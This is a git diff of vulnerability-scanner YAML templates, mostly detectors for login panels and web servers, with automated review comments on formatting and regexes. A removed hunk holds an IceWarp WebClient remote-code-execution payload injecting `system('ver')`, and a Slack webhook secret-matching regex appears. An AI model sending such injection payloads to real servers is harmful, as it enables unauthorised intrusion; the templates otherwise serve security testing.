@@ -1,25 +0,0 @@ -id: icewarp-webclient-rce -info: - name: IceWarp WebClient RCE - author: gy741 - severity: critical - reference: - - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - tags: icewarp,rce -requests: - - raw: - - | - POST /webmail/basic/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _dlg[captcha][target]=system(\'ver\')\ - matchers-condition: and - matchers: - - type: word - words: - - "Microsoft Windows [Version" - part: body - - type: status - status: - - 302 diff --git a/poc/web/icinga-web-login-8134.yaml b/poc/web/icinga-web-login-8134.yaml new file mode 100644 index 0000000000..0ef7258a86 --- /dev/null +++ b/poc/web/icinga-web-login-8134.yaml @@ -0,0 +1,22 @@ +id: icinga-web-login + +info: + name: Icinga Web 2 Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + tags: panel,icinga + +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Icinga Web 2 Login" + - type: status + status: + - 200 diff --git a/poc/web/icinga-web-login-8137.yaml b/poc/web/icinga-web-login-8137.yaml deleted file mode 100644 index 5602ac406b..0000000000 --- a/poc/web/icinga-web-login-8137.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: icinga-web-login - -info: - name: Icinga Web 2 Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"Icinga Web 2 Login" - tags: panel,icinga - -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login' - - matchers-condition: and - matchers: - - type: word - words: - - "Icinga Web 2 Login" - - type: status - status: - - 200 diff --git a/poc/web/icinga-web-login.yaml b/poc/web/icinga-web-login.yaml index 4c7f3d265e..5602ac406b 100644 --- a/poc/web/icinga-web-login.yaml +++ b/poc/web/icinga-web-login.yaml 
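Review bot: The new poc/web/icinga-web-login-8134.yaml puts a Shodan search URL in `reference`, whereas the revision deleted in the next hunk (icinga-web-login-8137.yaml) carried the same query as `shodan-query: http.title:"Icinga Web 2 Login"` under `metadata`. `reference` is better kept for advisories or vendor pages, so I would move the query back under `metadata`. The word matcher has no `part:`; adding `part: body` makes explicit where `Icinga Web 2 Login` is expected. The file has no `description`, and it shares `id: icinga-web-login` with icinga-web-login.yaml, which is changed later in this patch.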
@@ -1,20 +1,14 @@ id: icinga-web-login info: - name: Icinga Web 2 Login Panel - Detect + name: Icinga Web 2 Login author: dhiyaneshDK severity: info - description: Icinga Web 2 login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 shodan-query: http.title:"Icinga Web 2 Login" tags: panel,icinga -http: +requests: - method: GET path: - '{{BaseURL}}/authentication/login' @@ -24,9 +18,6 @@ http: - type: word words: - "Icinga Web 2 Login" - - type: status status: - 200 - -# digest: 4a0a00473045022100b93f1bc0afb3895ba775c85a240d2acb0a39e22f725c0e7d8e75ec71bf39e1aa022068d32d69ef34775c7343e9e5d1c9682834d4961df25a63fd9fb9019eb57eb7fe:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/iplanet-web-server-8190.yaml b/poc/web/iplanet-web-server-8190.yaml deleted file mode 100644 index 60f5c19673..0000000000 --- a/poc/web/iplanet-web-server-8190.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: iplanet-web-server -info: - name: Detect iPlanet Webserver Detection - author: pussycat0x - severity: info - tags: tech,webserver - metadata: - fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "iPlanet" - - type: status - status: - - 200 diff --git a/poc/web/iplanet-web-server-8191.yaml b/poc/web/iplanet-web-server-8191.yaml new file mode 100644 index 0000000000..78c1d984a9 --- /dev/null +++ b/poc/web/iplanet-web-server-8191.yaml @@ -0,0 +1,21 @@ +id: iplanet-web-server +info: + name: Detect iPlanet Webserver Detection + author: pussycat0x + severity: info + metadata: + fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" + tags: tech,webserver +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "iPlanet" + - type: status + status: + - 200 
diff --git a/poc/web/iplanet-web-server.yaml b/poc/web/iplanet-web-server.yaml index 78c1d984a9..60f5c19673 100644 --- a/poc/web/iplanet-web-server.yaml +++ b/poc/web/iplanet-web-server.yaml @@ -3,9 +3,9 @@ info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info - metadata: - fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" tags: tech,webserver + metadata: + fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' requests: - method: GET path: diff --git a/poc/web/keenetic-web-login-8442.yaml b/poc/web/keenetic-web-login-8442.yaml new file mode 100644 index 0000000000..0d24c5fc72 --- /dev/null +++ b/poc/web/keenetic-web-login-8442.yaml @@ -0,0 +1,19 @@ +id: keenetic-web-login +info: + name: Keenetic Web Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6817 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login#goto=%2Fdashboard' + matchers-condition: and + matchers: + - type: word + words: + - 'Keenetic Web' + - type: status + status: + - 200 diff --git a/poc/web/keenetic-web-login-8443.yaml b/poc/web/keenetic-web-login-8443.yaml deleted file mode 100644 index bc9aba324b..0000000000 --- a/poc/web/keenetic-web-login-8443.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: keenetic-web-login - -info: - name: Keenetic Web Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6817 - tags: panel,keenetic - -requests: - - method: GET - path: - - '{{BaseURL}}/login#goto=%2Fdashboard' - - matchers-condition: and - matchers: - - type: word - words: - - 'Keenetic Web' - - type: status - status: - - 200 diff --git a/poc/web/microweber-detect-8863.yaml b/poc/web/microweber-detect-8863.yaml index 64a576d65e..25c567062d 100644 --- a/poc/web/microweber-detect-8863.yaml +++ b/poc/web/microweber-detect-8863.yaml 
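Review bot: The path `'{{BaseURL}}/login#goto=%2Fdashboard'` in the new keenetic-web-login-8442.yaml carries a URL fragment, which is normally resolved on the client and not sent in the request line, so the probe most likely just fetches `/login`. Writing `- '{{BaseURL}}/login'` states what is actually requested. The word matcher `'Keenetic Web'` has no explicit `part:`, and adding `part: body` would document where the match is expected. saia-web-server-info.yaml later in this patch uses the same fragment pattern in `/loadtextfile.htm#programinfo`.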
@@ -3,10 +3,9 @@ info: name: Microweber Detect author: princechaddha severity: info - reference: - - https://github.com/microweber/microweber + reference: https://github.com/microweber/microweber metadata: - shodan-query: http.favicon.hash:780351152 + shodan-query: 'http.favicon.hash:780351152' tags: tech,microweber,oss requests: - method: GET diff --git a/poc/web/microweber-detect.yaml b/poc/web/microweber-detect.yaml index 25c567062d..52947ee5a2 100644 --- a/poc/web/microweber-detect.yaml +++ b/poc/web/microweber-detect.yaml @@ -1,22 +1,30 @@ id: microweber-detect + info: name: Microweber Detect author: princechaddha severity: info - reference: https://github.com/microweber/microweber + reference: + - https://github.com/microweber/microweber metadata: - shodan-query: 'http.favicon.hash:780351152' + max-request: 1 + shodan-query: http.favicon.hash:780351152 tags: tech,microweber,oss -requests: + +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - '"generator" content="Microweber" />' + - type: status status: - 200 + +# digest: 490a0046304402200d363b411e7ba5a9a8385045c6324b8b1e2ef7452bfefd53daa432ac4722c4f802200f8f8472e00aa021a7c47e526b5fdeeab111961625c1d715d9a7e550e1d948fa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/microweber-xss.yaml b/poc/web/microweber-xss.yaml index e3b0bb3e84..70c7e8a91c 100644 --- a/poc/web/microweber-xss.yaml +++ b/poc/web/microweber-xss.yaml 
@@ -3,16 +3,17 @@ info: name: Microweber Cross-Site Scripting author: gy741 severity: high - description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + description: "Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber." reference: - https://github.com/microweber/microweber/issues/809 - https://github.com/microweber/microweber + metadata: + shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 + cve-id: cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 tags: microweber,xss,oss requests: - method: GET diff --git a/poc/web/oracle-iplanet-web-server-9392.yaml b/poc/web/oracle-iplanet-web-server-9392.yaml new file mode 100644 index 0000000000..f7bb146ace --- /dev/null +++ b/poc/web/oracle-iplanet-web-server-9392.yaml @@ -0,0 +1,28 @@ +id: oracle-iplanet-web-server + +info: + name: Detect Oracle-iPlanet-Web-Server + author: pussycat0x + severity: info + metadata: + max-request: 1 + fofa-query: app="Oracle-iPlanet-Web-Server + tags: tech,oracle + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Oracle iPlanet Web Server" + + - type: status + status: + - 200 + +# digest: 490a004630440220609b86d9a84db9945e09cb7170deff3c55f1df6b010cdded85064fca20fc9360022078f76d7916e3d272d78ac746644df57c1c475b279aee3c0250c2c56f7756f4c4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/oracle-iplanet-web-server.yaml b/poc/web/oracle-iplanet-web-server.yaml deleted file mode 100644 index 8bd76eabb4..0000000000 --- a/poc/web/oracle-iplanet-web-server.yaml +++ /dev/null 
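Review bot: The microweber-xss.yaml hunk adds `cve-id:` with no value inside `classification`, which YAML parses as null and which tells a reader nothing. Either drop the line or fill in the assigned identifier if one exists for the issue linked in `reference`. The hunk also wraps `description` in double quotes and moves `metadata` above `classification`, which is harmless, but the sibling templates in this patch put `classification` first and consistency would help diffing. The `info:` block opens above the hunk and `requests:` continues below it.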
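Review bot: In the new oracle-iplanet-web-server-9392.yaml the value `fofa-query: app="Oracle-iPlanet-Web-Server` has an opening double quote that is never closed. YAML accepts it as a plain scalar, so the template loads, but the query string itself is malformed for anyone who copies it into a search. I would write `fofa-query: app="Oracle-iPlanet-Web-Server"`. The deleted oracle-iplanet-web-server.yaml carried the same typo, so this is a chance to fix it rather than carry it over.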
@@ -1,21 +0,0 @@ -id: oracle-iplanet-web-server -info: - name: Detect Oracle-iPlanet-Web-Server - author: pussycat0x - severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server - tags: tech,oracle -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Oracle iPlanet Web Server" - - type: status - status: - - 200 diff --git a/poc/web/r-webserver-login.yaml b/poc/web/r-webserver-login.yaml index 94dfe34794..5e2be9c394 100644 --- a/poc/web/r-webserver-login.yaml +++ b/poc/web/r-webserver-login.yaml @@ -1,19 +1,33 @@ id: r-webserver-login + info: - name: R WebServer Login + name: R WebServer Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7132 - tags: panel,rwebserver -requests: + description: R WebServer login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7132 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,panel,rwebserver + +http: - method: GET path: - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word words: - "R WebServer" + - type: status status: - 200 + +# digest: 490a00463044022065379692db243fa1d115f286378173a32b973de295c34e846b5c5ef0c3132dc50220658f791bd86e5cdfb9e31fdeb4d355ca18db17b33f97e7e6aa073bbbbdfda42a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/saia-web-server-info-9979.yaml b/poc/web/saia-web-server-info-9979.yaml index cdf7f8823b..36354a771d 100644 --- a/poc/web/saia-web-server-info-9979.yaml +++ b/poc/web/saia-web-server-info-9979.yaml @@ -3,7 +3,8 @@ info: name: Saia PCD Web-Server author: DhiyaneshDk severity: low - reference: https://www.exploit-db.com/ghdb/6865 + reference: + - https://www.exploit-db.com/ghdb/6865 tags: config,exposure requests: - method: GET 
diff --git a/poc/web/saia-web-server-info.yaml b/poc/web/saia-web-server-info.yaml new file mode 100644 index 0000000000..cdf7f8823b --- /dev/null +++ b/poc/web/saia-web-server-info.yaml @@ -0,0 +1,20 @@ +id: saia-web-server +info: + name: Saia PCD Web-Server + author: DhiyaneshDk + severity: low + reference: https://www.exploit-db.com/ghdb/6865 + tags: config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/loadtextfile.htm#programinfo" + matchers-condition: and + matchers: + - type: word + words: + - "Saia PCD Web Server" + part: body + - type: status + status: + - 200 diff --git a/poc/web/sap-netweaver-webgui.yaml b/poc/web/sap-netweaver-webgui.yaml deleted file mode 100644 index aa27e83989..0000000000 --- a/poc/web/sap-netweaver-webgui.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: sap-nw-webgui -info: - name: SAP NetWeaver WebGUI Detection - author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver WebGUI - severity: info - tags: sap,webserver -requests: - - method: GET - path: - - "{{BaseURL}}/sap/bc/gui/sap/its/webgui" - redirects: true - max-redirects: 2 - matchers: - - type: word - part: body - words: - - "sap-system-login" - - "Logon" - condition: or diff --git a/poc/web/sap-web-dispatcher-10078.yaml b/poc/web/sap-web-dispatcher-10078.yaml index cf5e1ad308..59a54042db 100644 --- a/poc/web/sap-web-dispatcher-10078.yaml +++ b/poc/web/sap-web-dispatcher-10078.yaml @@ -8,12 +8,11 @@ info: requests: - method: GET redirects: true - max-redirects: 5 + max-redirects: 2 path: - "{{BaseURL}}/inormalydonotexist" - matchers-condition: or matchers: - - type: regex + - type: word part: body - regex: - - "SAP Web Dispatcher" + words: + - "This error page was generated by SAP Web Dispatcher" diff --git a/poc/web/sap-web-dispatcher-admin-portal-10071.yaml b/poc/web/sap-web-dispatcher-admin-portal-10071.yaml new file mode 100644 index 0000000000..48af8eb5d7 --- /dev/null +++ b/poc/web/sap-web-dispatcher-admin-portal-10071.yaml 
@@ -0,0 +1,32 @@ +id: sap-web-dispatcher-admin-portal +info: + name: SAP Web Dispatcher admin portal detection + author: randomstr1ng + severity: info + description: Detection of SAP Web Dispatcher Admin Portal + tags: sap,webserver,proxy +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/sap/wdisp/admin/public/default.html" + matchers-condition: and + matchers: + - type: word + part: header + condition: or + words: + - "Basic realm=\"WEB ADMIN\"" + - "SAP NetWeaver Application Server" + - type: status + condition: or + status: + - 401 + - 200 + - type: word + part: body + condition: or + words: + - "SAP Web Dispatcher" + - "Administration" diff --git a/poc/web/slack-webhook(1).yaml b/poc/web/slack-webhook(1).yaml new file mode 100644 index 0000000000..97548ae165 --- /dev/null +++ b/poc/web/slack-webhook(1).yaml @@ -0,0 +1,16 @@ +id: slack-webhook + +info: + name: Slack Webhook + author: gaurang + severity: high + tags: token,file,slack + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" diff --git a/poc/web/slack-webhook-11865.yaml b/poc/web/slack-webhook-11865.yaml deleted file mode 100644 index b1bdaf766c..0000000000 --- a/poc/web/slack-webhook-11865.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: slack-webhook -info: - name: Slack Webhook - author: gaurang - severity: high - tags: token,file,slack -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" diff --git a/poc/web/slack-webhook.yaml b/poc/web/slack-webhook.yaml index c44af0fefa..b1bdaf766c 100644 --- a/poc/web/slack-webhook.yaml +++ b/poc/web/slack-webhook.yaml @@ -1,5 +1,4 @@ id: slack-webhook - info: name: Slack Webhook author: gaurang 
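Review bot: The extractor regex in the new slack-webhook(1).yaml fixes the workspace and channel parts at exactly eight characters (`T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}`), so a leaked webhook whose identifiers are longer would not be reported. Slack identifiers issued in recent years are commonly longer than eight characters, so I would use ranges such as `{8,12}` for both parts and confirm the upper bound against current Slack documentation. The file also reuses `id: slack-webhook`, which poc/web/slack-webhook.yaml already declares, and the `(1)` in the file name suggests an accidental copy; two templates with one id make results ambiguous.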
@@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" - -# digest: 4a0a0047304502206557ca925847e608d57b3a0bac581a2f51d85421f88fec1579e5cef728feabc8022100f97bae693d3bdf94877bac3c5e53bec9765196113fa213567d0ae28ec092a819:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/spark-webui-unauth-10401.yaml b/poc/web/spark-webui-unauth-10401.yaml new file mode 100644 index 0000000000..6ca1120cb0 --- /dev/null +++ b/poc/web/spark-webui-unauth-10401.yaml @@ -0,0 +1,26 @@ +id: spark-webui-unauth + +info: + name: Unauthenticated Spark WebUI + author: princechaddha + severity: medium + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Spark Master at spark://" + - "<strong>URL:</strong>" + part: body + condition: and diff --git a/poc/web/spark-webui-unauth.yaml b/poc/web/spark-webui-unauth.yaml index 31a45c9631..a917ae6951 100644 --- a/poc/web/spark-webui-unauth.yaml +++ b/poc/web/spark-webui-unauth.yaml 
@@ -1,31 +1,22 @@ id: spark-webui-unauth - info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: - - https://github.com/vulhub/vulhub/tree/master/spark/unacc - metadata: - max-request: 1 - tags: unauth,vulhub,spark - -http: + reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "<title>Spark Master at spark://" - "<strong>URL:</strong>" part: body condition: and - -# digest: 4a0a004730450220270869b1b7fd1729ea28140dbf8a434ca5b2b341dd040852601e1b37cd1e8499022100942b17a3cf90e2d877e8ffed244ff81baa455305d50bfbf4e5c9f90ad08771e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/synology-web-station-10631.yaml b/poc/web/synology-web-station-10631.yaml index 637a740b03..a592c99a3d 100644 --- a/poc/web/synology-web-station-10631.yaml +++ b/poc/web/synology-web-station-10631.yaml @@ -1,33 +1,20 @@ id: synology-web-station - info: - name: Synology Web Station Page - Detect + name: Synology Web Station author: dhiyaneshDK severity: info - description: Synology Web Station page was detected. reference: - https://www.exploit-db.com/ghdb/7125 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: tech,synology,edb - -http: + tags: tech,synology +requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - '<title>Hello! Welcome to Synology Web Station!' - - type: status status: - 200 - -# digest: 4a0a0047304502207768a29f7b0beae42dce5f17479a2498e1f9fad755c7ea1942e4b8975aba33f90221008a5b09a2ae04dec5d695dff02c64e76372b39d9b422b45244180a1d2f69e917a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/synology-web-station-10632.yaml b/poc/web/synology-web-station-10632.yaml index 8bde0932a3..637a740b03 100644 
--- a/poc/web/synology-web-station-10632.yaml +++ b/poc/web/synology-web-station-10632.yaml @@ -1,13 +1,21 @@ id: synology-web-station info: - name: Synology Web Station + name: Synology Web Station Page - Detect author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7125 - tags: tech,synology + description: Synology Web Station page was detected. + reference: + - https://www.exploit-db.com/ghdb/7125 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: tech,synology,edb -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502207768a29f7b0beae42dce5f17479a2498e1f9fad755c7ea1942e4b8975aba33f90221008a5b09a2ae04dec5d695dff02c64e76372b39d9b422b45244180a1d2f69e917a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/web-config-11125.yaml b/poc/web/web-config-11125.yaml deleted file mode 100644 index 7c1e1b7f62..0000000000 --- a/poc/web/web-config-11125.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: web-config - -info: - name: Web Config file - author: Yash Anand @yashanand155 - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/web.config' - - matchers-condition: and - matchers: - - type: word - words: - - - - - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/web/web-ftp-detect-11136.yaml b/poc/web/web-ftp-detect-11136.yaml deleted file mode 100644 index 6540382c6d..0000000000 --- a/poc/web/web-ftp-detect-11136.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: web-ftp-detect - -info: - name: Web FTP Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7013 - metadata: - max-request: 1 - tags: webftp,tech,ftp - -http: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" - - matchers-condition: and - matchers: - - type: word - words: - - "Web-FTP" - - "square login" - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100efcee6e66d7053086c4b8f4e4c3b35dfa35be3f7e41e8afdd72b0e66aabb7273022027d04d5e11387148b9587035d7b31e3483d7a6f8e447785a2eece21ef1314738:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/web-ftp-detect-11137.yaml b/poc/web/web-ftp-detect-11137.yaml index 03f7ce1fc3..646c4f7e98 100644 --- a/poc/web/web-ftp-detect-11137.yaml +++ b/poc/web/web-ftp-detect-11137.yaml @@ -1,23 +1,20 @@ -id: web-ftp-detect - -info: - name: Web FTP Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7013 - tags: webftp,tech,ftp - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" - - matchers-condition: and - matchers: - - type: word - words: - - "Web-FTP" - - "square login" - - type: status - status: - - 200 \ No newline at end of file +id: web-ftp-detect +info: + name: Web FTP Detection + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7013 + tags: webftp,tech,ftp +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" + matchers-condition: and + matchers: + - type: word + words: + - "Web-FTP" + - "square login" + - type: status + status: + - 200 diff --git a/poc/web/web-local-craft-11139.yaml b/poc/web/web-local-craft-11139.yaml new file mode 100644 index 0000000000..fda38c4136 --- /dev/null +++ b/poc/web/web-local-craft-11139.yaml 
@@ -0,0 +1,19 @@ +id: weblocal-craft-login +info: + name: Web local craft Terminal Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6800 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + matchers-condition: and + matchers: + - type: word + words: + - 'WEB Local Craft Terminal' + - type: status + status: + - 200 diff --git a/poc/web/web-local-craft-11141.yaml b/poc/web/web-local-craft-11141.yaml deleted file mode 100644 index 1ac402b50e..0000000000 --- a/poc/web/web-local-craft-11141.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: weblocal-craft-login -info: - name: Web local craft Terminal Login - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6800 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/home.html' - matchers-condition: and - matchers: - - type: word - words: - - 'WEB Local Craft Terminal' - - type: status - status: - - 200 diff --git a/poc/web/web-service-panel.yaml b/poc/web/web-service-panel.yaml index 1e241b5a7f..9a30df6abd 100644 --- a/poc/web/web-service-panel.yaml +++ b/poc/web/web-service-panel.yaml @@ -1,33 +1,19 @@ id: web-service-panel - info: - name: Web Service Panel -Detect + name: WEB SERVICE Panel author: dhiyaneshDK severity: info - description: Web Service panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7116 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: edb,panel,service - -http: + reference: https://www.exploit-db.com/ghdb/7116 + tags: panel,service +requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'WEB SERVICE' - - type: status status: - 200 - -# digest: 4a0a00473045022100c5cc44e49283a0b27782bca26dc69b8606e5b4bcedfb66abcd09cc24e3397bcd022002a91f2d20643990032e71f41916cbe69775ea4c852da9bfc8d9a9f1e3303129:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/web/web-suite-detect-11168.yaml b/poc/web/web-suite-detect-11168.yaml new file mode 100644 index 0000000000..33bf8280f2 --- /dev/null +++ b/poc/web/web-suite-detect-11168.yaml @@ -0,0 +1,36 @@ +id: web-suite-detect + +info: + name: Web Suite Detect + author: pikpikcu + severity: info + metadata: + fofa-query: "Web Suite 2021 Login" + tags: tech,web-suite + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/ws2020/" + - "{{BaseURL}}/ws2021/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'www.bqe.com">BQE Software Inc.' + - 'Web Suite' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Version: (.*)" diff --git a/poc/web/web-suite-detect.yaml b/poc/web/web-suite-detect.yaml deleted file mode 100644 index 63881cf69f..0000000000 --- a/poc/web/web-suite-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: web-suite-detect -info: - name: Web Suite Detect - author: pikpikcu - severity: info - metadata: - fofa-query: Web Suite 2021 Login - tags: tech,web-suite -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/ws2020/" - - "{{BaseURL}}/ws2021/" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'www.bqe.com">BQE Software Inc.' - - 'Web Suite' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - "Version: (.*)" diff --git a/poc/web/webcamxp-5-11122.yaml b/poc/web/webcamxp-5-11122.yaml deleted file mode 100644 index 01ffef8b54..0000000000 --- a/poc/web/webcamxp-5-11122.yaml +++ /dev/null 
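Review bot: The extractor in web-suite-detect-11168.yaml uses `"Version: (.*)"`, which captures everything up to the end of the line, so any markup that follows the version on the same line ends up in the extracted value. A narrower group such as `"Version: ([0-9.]+)"` would return only the version number, assuming the product prints a dotted numeric version (worth checking against a real page). The three paths are all requested for every host; adding `stop-at-first-match: true` at the request level would avoid duplicate results once one path matches.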
@@ -1,34 +0,0 @@ -id: webcamxp-5 - -info: - name: WebcamXP 5 Login Panel - Detect - author: dhiyaneshDK - severity: info - description: WebcamXP 5 login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7448 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"webcamXP 5" - tags: iot,edb - -http: - - method: GET - path: - - '{{BaseURL}}/home.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'webcamXP 5' - - - type: status - status: - - 200 - -# digest: 490a0046304402202093e097b013ffa84a34fb92d7ea73483077f22fec6de3409dcb51f74e79fd7f022019bcc0302ac58911e1d921bb5d1476d23229a13895e1505b09ceecb1614e6dec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/webcamxp-5.yaml b/poc/web/webcamxp-5.yaml new file mode 100644 index 0000000000..4af1a58d72 --- /dev/null +++ b/poc/web/webcamxp-5.yaml @@ -0,0 +1,21 @@ +id: webcamxp-5 +info: + name: webcamXP 5 + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7448 + tags: iot + metadata: + shodan-query: 'http.title:"webcamXP 5"' +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + matchers-condition: and + matchers: + - type: word + words: + - 'webcamXP 5' + - type: status + status: + - 200 diff --git a/poc/web/webeditors-11129.yaml b/poc/web/webeditors-11129.yaml deleted file mode 100644 index 3e9bfb059c..0000000000 --- a/poc/web/webeditors-11129.yaml +++ /dev/null 
